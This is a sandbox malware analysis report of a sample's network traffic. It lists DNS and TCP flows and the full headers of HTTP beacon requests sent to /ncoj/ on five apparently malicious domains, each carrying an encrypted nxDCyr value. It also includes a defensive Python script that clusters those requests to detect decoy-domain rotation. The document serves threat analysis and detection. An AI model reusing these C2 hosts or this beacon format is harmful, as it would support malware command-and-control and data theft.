Network Analysis

TCP Requests
Source | Destination | Host |
---|---|---|
192.168.56.101:49170 | 104.21.66.93:80 | www.bord90-1us.click |
192.168.56.101:49171 | 104.21.66.93:80 | www.bord90-1us.click |
192.168.56.101:49177 | 142.250.66.51:80 | www.bimiraq.com |
192.168.56.101:49178 | 142.250.66.51:80 | www.bimiraq.com |
192.168.56.101:49181 | 154.221.16.17:80 | www.38mwynj7dug2.buzz |
192.168.56.101:49182 | 154.221.16.17:80 | www.38mwynj7dug2.buzz |
192.168.56.101:49179 | 172.67.142.142:80 | www.antsnav.com |
192.168.56.101:49180 | 172.67.142.142:80 | www.antsnav.com |
192.168.56.101:49183 | 38.181.59.39:80 | www.lppkk.com |
192.168.56.101:49184 | 38.181.59.39:80 | www.lppkk.com |
192.168.56.101:49172 | 45.33.6.223:80 | www.sqlite.org |

Every outbound TCP connection is to port 80, and each of the five /ncoj/ hosts gets exactly two connections (one POST, one GET); no TLS was used at all.

UDP Requests
Source | Destination |
---|---|
192.168.56.101:53004 | 164.124.101.2:53 |
192.168.56.101:53850 | 164.124.101.2:53 |
192.168.56.101:54148 | 164.124.101.2:53 |
192.168.56.101:54883 | 164.124.101.2:53 |
192.168.56.101:55146 | 164.124.101.2:53 |
192.168.56.101:59002 | 164.124.101.2:53 |
192.168.56.101:61950 | 164.124.101.2:53 |
192.168.56.101:137 | 192.168.56.255:137 |
192.168.56.101:59005 | 239.255.255.250:1900 |
192.168.56.103:137 | 192.168.56.101:137 |

The seven queries to 164.124.101.2:53 are the DNS lookups for the hosts above. The NetBIOS name-service traffic on port 137 (including the query from 192.168.56.103, another machine on the sandbox's host-only network) and the SSDP multicast to 239.255.255.250:1900 are normal Windows LAN background noise, not sample behaviour.
HTTP Requests
Eleven HTTP exchanges were captured, all in plaintext. The same URI path /ncoj/ is contacted on five unrelated domains, each time as a POST followed by a GET whose query string carries a long per-host nxDCyr value and an identical trailing 6h=f51UoXbt17G token. Four of the five domains answer 404 and the fifth only redirects to HTTPS, so this reads as C2 beaconing that rotates through decoy domains rather than ordinary browsing. The beacons use an iPad Safari User-Agent, while the sqlite.org download uses a stock MSIE 7 string, which points to two different HTTP clients inside the sample. Request bodies are not reproduced in the report; only the headers follow.

POST 404 http://www.bord90-1us.click/ncoj/
REQUEST
POST /ncoj/ HTTP/1.1
Host: www.bord90-1us.click
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Content-Length: 175
Content-Type: application/x-www-form-urlencoded
Connection: close
Cache-Control: max-age=0
Origin: http://www.bord90-1us.click
Referer: http://www.bord90-1us.click/ncoj/
User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
RESPONSE
HTTP/1.1 404 Not Found
Date: Tue, 03 Oct 2023 22:48:07 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
x-turbo-charged-by: LiteSpeed
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=gZP8IG9ejEpSV1qzDHqxhJPPKRTj%2Bji8HMBtvDUcvbRnBSHUkD8QKt%2FtXHDkChqSSzWAXAlJSvor7yxhjdo7HpfmkPiuTJFWjRF0FtbLqaxmSZabAdUBmmYspqn4pFQXg6%2FRBwnRgw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8108bb153fdcfbd4-KIX
Content-Encoding: gzip
alt-svc: h3=":443"; ma=86400

GET 404 http://www.bord90-1us.click/ncoj/?nxDCyr=/wpW4Eg1zfji5WRIM69mwwfkBKVWxDHOUMH3dJ+6otM1KiL+BV8qZwOPMcyaXeTE36ZRIVdGgp9cEXlGc10Qp3ASMmejNlAX5LVEWFU=&6h=f51UoXbt17G
REQUEST
GET /ncoj/?nxDCyr=/wpW4Eg1zfji5WRIM69mwwfkBKVWxDHOUMH3dJ+6otM1KiL+BV8qZwOPMcyaXeTE36ZRIVdGgp9cEXlGc10Qp3ASMmejNlAX5LVEWFU=&6h=f51UoXbt17G HTTP/1.1
Host: www.bord90-1us.click
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Connection: close
User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
RESPONSE
HTTP/1.1 404 Not Found
Date: Tue, 03 Oct 2023 22:48:10 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
x-turbo-charged-by: LiteSpeed
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=03bPWTf0Eoad1jKrEwXv1P18b1%2FDKH4mZiaXN6IxpP4PNnBNMS%2BF187TjliapSUAclgRNc5flu18Q80eTPifk3tSxrSOBIZjjAMjg4sgW%2BjmzKuUNgVTI3fjGfpwbTsef3ludher5Q%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8108bb250dc90aa6-KIX
alt-svc: h3=":443"; ma=86400

GET 200 http://www.sqlite.org/2021/sqlite-dll-win32-x86-3350000.zip
REQUEST
GET /2021/sqlite-dll-win32-x86-3350000.zip HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2; .NET4.0C; .NET4.0E)
Host: www.sqlite.org
Connection: Keep-Alive
RESPONSE
HTTP/1.1 200 OK
Connection: keep-alive
Date: Tue, 03 Oct 2023 22:48:12 GMT
Last-Modified: Mon, 15 Mar 2021 12:22:51 GMT
Cache-Control: max-age=120
ETag: "m604f519bs7c92b"
Content-type: application/zip; charset=utf-8
Content-length: 510251

POST 301 http://www.bimiraq.com/ncoj/
REQUEST
POST /ncoj/ HTTP/1.1
Host: www.bimiraq.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Content-Length: 187
Content-Type: application/x-www-form-urlencoded
Connection: close
Cache-Control: max-age=0
Origin: http://www.bimiraq.com
Referer: http://www.bimiraq.com/ncoj/
User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
RESPONSE
HTTP/1.1 301 Moved Permanently
Content-Type: application/binary
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Tue, 03 Oct 2023 22:48:31 GMT
Location: https://www.bimiraq.com/ncoj/
Server: ESF
Content-Length: 0
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Connection: close

GET 301 http://www.bimiraq.com/ncoj/?nxDCyr=XIxLCAEQ0j01YzKaapTqF+nS+qsHR4K+mT3TcIh0YevVauHQuuRL63AlAq6+mNvg+WbM+1ZCwlrFZaygUBCQMrF8dtNZCh2ZDkiTiSo=&6h=f51UoXbt17G
REQUEST
GET /ncoj/?nxDCyr=XIxLCAEQ0j01YzKaapTqF+nS+qsHR4K+mT3TcIh0YevVauHQuuRL63AlAq6+mNvg+WbM+1ZCwlrFZaygUBCQMrF8dtNZCh2ZDkiTiSo=&6h=f51UoXbt17G HTTP/1.1
Host: www.bimiraq.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Connection: close
User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
RESPONSE
HTTP/1.1 301 Moved Permanently
Content-Type: application/binary
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Tue, 03 Oct 2023 22:48:33 GMT
Location: https://www.bimiraq.com/ncoj/?nxDCyr=XIxLCAEQ0j01YzKaapTqF+nS+qsHR4K+mT3TcIh0YevVauHQuuRL63AlAq6+mNvg+WbM+1ZCwlrFZaygUBCQMrF8dtNZCh2ZDkiTiSo%3D&6h=f51UoXbt17G
Server: ESF
Content-Length: 0
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Connection: close

POST 404 http://www.antsnav.com/ncoj/
REQUEST
POST /ncoj/ HTTP/1.1
Host: www.antsnav.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Content-Length: 187
Content-Type: application/x-www-form-urlencoded
Connection: close
Cache-Control: max-age=0
Origin: http://www.antsnav.com
Referer: http://www.antsnav.com/ncoj/
User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
RESPONSE
HTTP/1.1 404 Not Found
Date: Tue, 03 Oct 2023 22:48:39 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=SejlgSOJAI3%2B%2BZNPG3LzxWwCZZDbyuLMO%2BjyhD2z%2B2sPIElWPHUdDwVEIBdqWxnSa2waiZXmW712%2BmSW5vBttNRD3Av2E4qvYPOQGoOGiPE9efLpY4TBoMfWfDdAhoB81Kg%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8108bbdc98081a25-KIX
Content-Encoding: gzip
alt-svc: h3=":443"; ma=86400

GET 404 http://www.antsnav.com/ncoj/?nxDCyr=k6lZgIYtgKScwrY8pHro/PDAsyN+Ma0X/rCAAme2ni/5IVGLYG0zVGplEfRL+3QOVGKsiLjVRU/vs+oeg30ChqgsNcJjfndCx8nhIPk=&6h=f51UoXbt17G
REQUEST
GET /ncoj/?nxDCyr=k6lZgIYtgKScwrY8pHro/PDAsyN+Ma0X/rCAAme2ni/5IVGLYG0zVGplEfRL+3QOVGKsiLjVRU/vs+oeg30ChqgsNcJjfndCx8nhIPk=&6h=f51UoXbt17G HTTP/1.1
Host: www.antsnav.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Connection: close
User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
RESPONSE
HTTP/1.1 404 Not Found
Date: Tue, 03 Oct 2023 22:48:41 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=dU3S1HLqLeOzh%2Bm1mR9ljzcEYuPEMPwX23%2Fb%2BfOwmx%2FTrdC9j3VTMFJHU2x7IDN5B9QH5NM8mUobpzOqQHiGYLmqJ5tLbsSFPUtib%2FQVk%2Bh%2FxJcphl8LXW06c26V0yE5g4M%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8108bbec595319fd-KIX
alt-svc: h3=":443"; ma=86400

POST 404 http://www.38mwynj7dug2.buzz/ncoj/
REQUEST
POST /ncoj/ HTTP/1.1
Host: www.38mwynj7dug2.buzz
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Content-Length: 187
Content-Type: application/x-www-form-urlencoded
Connection: close
Cache-Control: max-age=0
Origin: http://www.38mwynj7dug2.buzz
Referer: http://www.38mwynj7dug2.buzz/ncoj/
User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
RESPONSE
HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 03 Oct 2023 22:40:26 GMT
Content-Type: text/html
Content-Length: 146
Connection: close

GET 404 http://www.38mwynj7dug2.buzz/ncoj/?nxDCyr=cqsb9busYckswu5tl2hs1PEI9pWErdimDzlp34E2aha2iJT2eFFG/funIEYSTKoaqITRs/NPOvbiiBSI+XWo0HJ5fu7hwmxGTgtg6FY=&6h=f51UoXbt17G
REQUEST
GET /ncoj/?nxDCyr=cqsb9busYckswu5tl2hs1PEI9pWErdimDzlp34E2aha2iJT2eFFG/funIEYSTKoaqITRs/NPOvbiiBSI+XWo0HJ5fu7hwmxGTgtg6FY=&6h=f51UoXbt17G HTTP/1.1
Host: www.38mwynj7dug2.buzz
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Connection: close
User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
RESPONSE
HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 03 Oct 2023 22:40:29 GMT
Content-Type: text/html
Content-Length: 146
Connection: close

POST 404 http://www.lppkk.com/ncoj/
REQUEST
POST /ncoj/ HTTP/1.1
Host: www.lppkk.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Content-Length: 187
Content-Type: application/x-www-form-urlencoded
Connection: close
Cache-Control: max-age=0
Origin: http://www.lppkk.com
Referer: http://www.lppkk.com/ncoj/
User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
RESPONSE
HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/10.0
X-Powered-By: ASP.NET
Date: Tue, 03 Oct 2023 22:48:55 GMT
Connection: close
Content-Length: 1163

GET 404 http://www.lppkk.com/ncoj/?nxDCyr=Mtp3WxtNvxk26bamdUjkb0yMxjBBBeG3EFYaeCPTWM8qB4rDVAANJEhbdFBrwp5JzidZg3tzQPFU7dQqmqHJyHV4uamwOaSCvkmmqms=&6h=f51UoXbt17G
REQUEST
GET /ncoj/?nxDCyr=Mtp3WxtNvxk26bamdUjkb0yMxjBBBeG3EFYaeCPTWM8qB4rDVAANJEhbdFBrwp5JzidZg3tzQPFU7dQqmqHJyHV4uamwOaSCvkmmqms=&6h=f51UoXbt17G HTTP/1.1
Host: www.lppkk.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Connection: close
User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
RESPONSE
HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/10.0
X-Powered-By: ASP.NET
Date: Tue, 03 Oct 2023 22:48:57 GMT
Connection: close
Content-Length: 1163
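The only IDS hit in this report is a generic TLD signature on the .buzz domain; the stronger signal is the traffic shape itself. The script below is an added example, not part of the sandbox report or of any tool it was produced with. It re-derives that shape from the eleven transactions above (the tuples are constructed from the report's own method, status, Host, request-target and User-Agent values; no bodies were captured, so none are modelled) and flags a URI path reused across unrelated hosts, separating query keys whose value is constant (campaign or bot identifier candidates) from keys whose value changes per request (encrypted payload candidates). The threshold `min_hosts` is an arbitrary choice for illustration.

```python
"""Added example (not from the report): cluster the captured HTTP
transactions to surface decoy-rotation beaconing and mixed User-Agents.
Input tuples are constructed from the report's own transactions."""
from collections import defaultdict

UA_IPAD = ("Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 "
           "(KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4")
UA_MSIE = ("Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; "
           "SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; "
           "InfoPath.2; .NET4.0C; .NET4.0E)")

# (method, status, Host, request-target, User-Agent), query strings kept raw.
TRANSACTIONS = [
    ("POST", 404, "www.bord90-1us.click", "/ncoj/", UA_IPAD),
    ("GET", 404, "www.bord90-1us.click",
     "/ncoj/?nxDCyr=/wpW4Eg1zfji5WRIM69mwwfkBKVWxDHOUMH3dJ+6otM1KiL+BV8qZwOPMcyaXeTE36ZRIVdGgp9cEXlGc10Qp3ASMmejNlAX5LVEWFU=&6h=f51UoXbt17G", UA_IPAD),
    ("GET", 200, "www.sqlite.org", "/2021/sqlite-dll-win32-x86-3350000.zip", UA_MSIE),
    ("POST", 301, "www.bimiraq.com", "/ncoj/", UA_IPAD),
    ("GET", 301, "www.bimiraq.com",
     "/ncoj/?nxDCyr=XIxLCAEQ0j01YzKaapTqF+nS+qsHR4K+mT3TcIh0YevVauHQuuRL63AlAq6+mNvg+WbM+1ZCwlrFZaygUBCQMrF8dtNZCh2ZDkiTiSo=&6h=f51UoXbt17G", UA_IPAD),
    ("POST", 404, "www.antsnav.com", "/ncoj/", UA_IPAD),
    ("GET", 404, "www.antsnav.com",
     "/ncoj/?nxDCyr=k6lZgIYtgKScwrY8pHro/PDAsyN+Ma0X/rCAAme2ni/5IVGLYG0zVGplEfRL+3QOVGKsiLjVRU/vs+oeg30ChqgsNcJjfndCx8nhIPk=&6h=f51UoXbt17G", UA_IPAD),
    ("POST", 404, "www.38mwynj7dug2.buzz", "/ncoj/", UA_IPAD),
    ("GET", 404, "www.38mwynj7dug2.buzz",
     "/ncoj/?nxDCyr=cqsb9busYckswu5tl2hs1PEI9pWErdimDzlp34E2aha2iJT2eFFG/funIEYSTKoaqITRs/NPOvbiiBSI+XWo0HJ5fu7hwmxGTgtg6FY=&6h=f51UoXbt17G", UA_IPAD),
    ("POST", 404, "www.lppkk.com", "/ncoj/", UA_IPAD),
    ("GET", 404, "www.lppkk.com",
     "/ncoj/?nxDCyr=Mtp3WxtNvxk26bamdUjkb0yMxjBBBeG3EFYaeCPTWM8qB4rDVAANJEhbdFBrwp5JzidZg3tzQPFU7dQqmqHJyHV4uamwOaSCvkmmqms=&6h=f51UoXbt17G", UA_IPAD),
]


def parse_target(target):
    """Split a request-target into (path, [(key, raw_value), ...]).
    Values are deliberately not URL-decoded: the nxDCyr blobs contain '+'
    and '/', which parse_qsl would alter, and they are only ever compared."""
    path, _, query = target.partition("?")
    pairs = []
    for item in query.split("&") if query else []:
        key, _, value = item.partition("=")
        pairs.append((key, value))
    return path, pairs


def find_decoy_rotation(transactions, min_hosts=3):
    """Flag every path contacted on at least `min_hosts` distinct hosts.
    Query keys with a single value across all requests are reported as
    campaign/bot-id candidates; keys that vary per request as payload
    candidates. Status codes show which hosts were only decoys."""
    by_path = defaultdict(list)
    for method, status, host, target, _ua in transactions:
        path, pairs = parse_target(target)
        by_path[path].append((method, status, host, pairs))

    findings = []
    for path, rows in sorted(by_path.items()):
        hosts = {host for _, _, host, _ in rows}
        if len(hosts) < min_hosts:
            continue
        values = defaultdict(set)
        for _, _, _, pairs in rows:
            for key, value in pairs:
                values[key].add(value)
        findings.append({
            "path": path,
            "hosts": sorted(hosts),
            "methods": sorted({m for m, _, _, _ in rows}),
            "statuses": sorted({s for _, s, _, _ in rows}),
            "constant_keys": {k: next(iter(v)) for k, v in values.items() if len(v) == 1},
            "variable_keys": sorted(k for k, v in values.items() if len(v) > 1),
        })
    return findings


def user_agents(transactions):
    """Map each User-Agent to the sorted hosts it was sent to; one infected
    host speaking with two unrelated UA strings is itself a signal."""
    seen = defaultdict(set)
    for _m, _s, host, _t, ua in transactions:
        seen[ua].add(host)
    return {ua: sorted(hosts) for ua, hosts in seen.items()}


if __name__ == "__main__":
    for f in find_decoy_rotation(TRANSACTIONS):
        print(f"{f['path']} contacted on {len(f['hosts'])} hosts: {', '.join(f['hosts'])}")
        print(f"  methods {f['methods']}, statuses {f['statuses']}")
        print(f"  constant keys {f['constant_keys']}, per-request keys {f['variable_keys']}")
    for ua, hosts in user_agents(TRANSACTIONS).items():
        print(f"UA {ua[:45]!r}... -> {hosts}")
```

Run as-is, it reports /ncoj/ on all five domains with methods GET and POST, statuses 301 and 404, the constant key 6h=f51UoXbt17G and the per-request key nxDCyr, plus the two User-Agent strings with their hosts. The same grouping works unchanged on a proxy log exported as (method, status, host, target, UA) rows; the path-reuse threshold, not the domain list, is what carries over to new samples whose decoy domains differ.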
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 192.168.56.101:49182 -> 154.221.16.17:80 | 2032991 | ET INFO HTTP Request to a *.buzz domain | Potentially Bad Traffic |
TCP 192.168.56.101:49181 -> 154.221.16.17:80 | 2032991 | ET INFO HTTP Request to a *.buzz domain | Potentially Bad Traffic |
Suricata TLS
No Suricata TLS events (all captured traffic was plaintext HTTP on port 80).
Snort Alerts
No Snort Alerts